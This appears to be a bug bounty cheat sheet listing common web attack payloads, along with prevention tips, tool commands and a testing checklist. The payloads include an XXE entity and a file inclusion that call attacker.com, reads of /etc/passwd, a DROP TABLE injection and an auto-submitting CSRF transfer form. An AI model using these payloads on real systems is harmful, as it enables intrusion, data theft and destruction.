๐Ÿ“‹ Cheat Sheets

Master Quick Reference - All Vulnerabilities

๐ŸŽฏ One-Page Reference for All Common Web Vulnerabilities

๐Ÿ”ด XSS (Cross-Site Scripting)

Quick Test: <script>alert(1)</script>

Payloads:

html
<img src=x onerror=alert(1)>
<svg onload=alert(1)>
"><script>alert(1)</script>
<iframe src="javascript:alert(1)">

Prevention: Output encoding, CSP, HTTPOnly cookies

๐Ÿ”ด SQL Injection

Quick Test: ' or 1'or'1'='1

Payloads:

sql
' OR '1'='1'--
' UNION SELECT NULL,NULL--
'; DROP TABLE users--
' AND SLEEP(5)--

Prevention: Parameterized queries, input validation

๐Ÿ”ด SSRF (Server-Side Request Forgery)

Quick Test: http://127.0.0.1 or http://169.254.169.254

Targets:

http://localhost/admin http://192.168.1.1 http://169.254.169.254/latest/meta-data/ file:///etc/passwd

Prevention: URL whitelist, network segmentation

๐Ÿ”ด CSRF (Cross-Site Request Forgery)

Quick Test: Create form that auto-submits

Exploit:

html
<form action="https://bank.com/transfer" method="POST">
    <input name="to" value="attacker" />
    <input name="amount" value="10000" />
</form>
<script>document.forms[0].submit();</script>

Prevention: Anti-CSRF tokens, SameSite cookies

๐Ÿ”ด IDOR (Insecure Direct Object Reference)

Quick Test: Change /user/123 to /user/124

Locations:

/api/user/123 โ†’ /api/user/124 /invoice/100 โ†’ /invoice/101 /download?file=1.pdf โ†’ ?file=2.pdf

Prevention: Access control checks, indirect references

๐Ÿ”ด XXE (XML External Entity)

Quick Test:

xml
<?xml version="1.0"?>
<!DOCTYPE foo [<!ENTITY xxe SYSTEM "file:///etc/passwd">]>
<root>&xxe;</root>

OOB Exploit:

xml
<!ENTITY % file SYSTEM "file:///etc/passwd">
<!ENTITY % dtd SYSTEM "http://attacker.com/evil.dtd">
%dtd;

Prevention: Disable external entities, use JSON

๐Ÿ”ด Command Injection

Quick Test: ; whoami or | whoami

Payloads:

bash
; ls -la
| cat /etc/passwd
& ping -c 10 attacker.com
`whoami`
$(whoami)

Prevention: Input validation, avoid system calls

๐Ÿ”ด File Upload

Quick Test: Upload .php.jpg or PHP shell as image

Bypasses:

shell.php.jpg (double extension) shell.php%00.jpg (null byte) .htaccess upload SVG with embedded JavaScript

Prevention: Whitelist extensions, content-type validation

๐Ÿ”ด JWT Attacks

Quick Test: Change algorithm to "none"

Attacks:

Algorithm confusion (RS256โ†’HS256) Weak secret brute force Signature stripping Payload modification (role: admin)

Prevention: Strong secrets, algorithm whitelist

๐Ÿ”ด Authentication Bypass

Quick Tests:

admin' -- ' OR 1=1-- Password reset token brute force Session fixation Weak passwords

Prevention: Strong authentication, rate limiting

๐ŸŽฏ Testing Checklist

Recon

  • Subdomain enumeration (subfinder, amass)
  • Port scanning (nmap)
  • Technology detection (Wappalyzer)
  • URL discovery (waybackurls, gau)
  • JavaScript analysis

Input Testing

  • All input fields
  • URL parameters
  • HTTP headers
  • Cookies
  • File uploads
  • JSON/XML endpoints

Authentication

  • Login bypass
  • Password reset
  • Session management
  • OAuth flows
  • 2FA bypass

Authorization

  • IDOR
  • Privilege escalation
  • Path traversal
  • API access control

Injection

  • SQL injection
  • XSS
  • Command injection
  • XXE
  • SSTI
  • LDAP injection

Business Logic

  • Race conditions
  • Price manipulation
  • Workflow bypass
  • Mass assignment

๐Ÿ› ๏ธ Essential Tools

Must Have:

  • Burp Suite (proxy, scanner)
  • Browser DevTools
  • curl / Postman

Recon:

  • subfinder (subdomains)
  • httpx (HTTP probing)
  • waybackurls (URL history)
  • nuclei (vulnerability scanner)

Exploitation:

  • SQLMap (SQL injection)
  • XSStrike (XSS detection)
  • ffuf (fuzzing)

Password Attacks:

  • hashcat (hash cracking)
  • john (password cracking)

๐Ÿ’ฅ Common Payloads

XSS

html
<script>alert(document.domain)</script>
<img src=x onerror=alert(1)>
<svg onload=alert(1)>
"><script>alert(1)</script>
javascript:alert(1)

SQLi

sql
' OR '1'='1
' UNION SELECT NULL--
'; DROP TABLE users--
' AND SLEEP(5)--
admin' --

Command Injection

bash
; ls
| whoami
& cat /etc/passwd
`id`
$(uname -a)

Path Traversal

../../../etc/passwd ..\..\..\..\windows\win.ini ....//....//....//etc/passwd

LFI/RFI

?file=../../../etc/passwd ?page=http://attacker.com/shell.txt ?include=php://filter/convert.base64-encode/resource=index.php

๐Ÿš€ Quick Commands

Burp Suite

Ctrl+R: Send to Repeater Ctrl+I: Send to Intruder Ctrl+Shift+B: Base64 encode Ctrl+Shift+U: URL encode

Subdomain Enum

bash
subfinder -d target.com | httpx | nuclei

Full Recon

bash
subfinder -d target.com | httpx | waybackurls | grep "\.js$" | httpx

SQLMap

bash
sqlmap -u "url?id=1" --dbs --batch

Directory Fuzzing

bash
ffuf -u https://target.com/FUZZ -w wordlist.txt -fc 404

๐Ÿ“Š CVSS Severity

ScoreSeverityImpact
0.0NoneNo impact
0.1-3.9LowMinimal impact
4.0-6.9MediumModerate impact
7.0-8.9HighSignificant impact
9.0-10.0CriticalSevere impact

๐ŸŽฏ Bug Bounty Impact

Critical ($5000-$20000+):

  • RCE
  • Authentication bypass
  • SQL injection (data access)
  • SSRF to cloud metadata

High ($1000-$5000):

  • Stored XSS
  • IDOR (sensitive data)
  • XXE
  • Account takeover

Medium ($200-$1000):

  • Reflected XSS
  • CSRF
  • Open redirect
  • Information disclosure

Low ($50-$200):

  • Self-XSS
  • Missing headers
  • Clickjacking
  • Rate limiting bypass

๐Ÿ’ก Pro Tips

  1. Start with low-hanging fruit - XSS, SQLi, IDOR
  2. Automate recon - Build pipelines
  3. Read disclosed reports - Learn from others
  4. Focus on logic - Business logic bugs pay well
  5. Chain vulnerabilities - XSS + CSRF = high impact
  6. Test mobile APIs - Often less secure
  7. Check old endpoints - Use waybackurls
  8. Follow methodology - Systematic > random testing

Only test on:

  • โœ… Your own applications
  • โœ… Authorized bug bounty programs
  • โœ… Practice labs (DVWA, Juice Shop)

Never:

  • โŒ Unauthorized systems
  • โŒ Out-of-scope domains
  • โŒ Production databases

Happy Hacking! ๐Ÿ”

This is a quick reference. See individual cheat sheets for detailed information.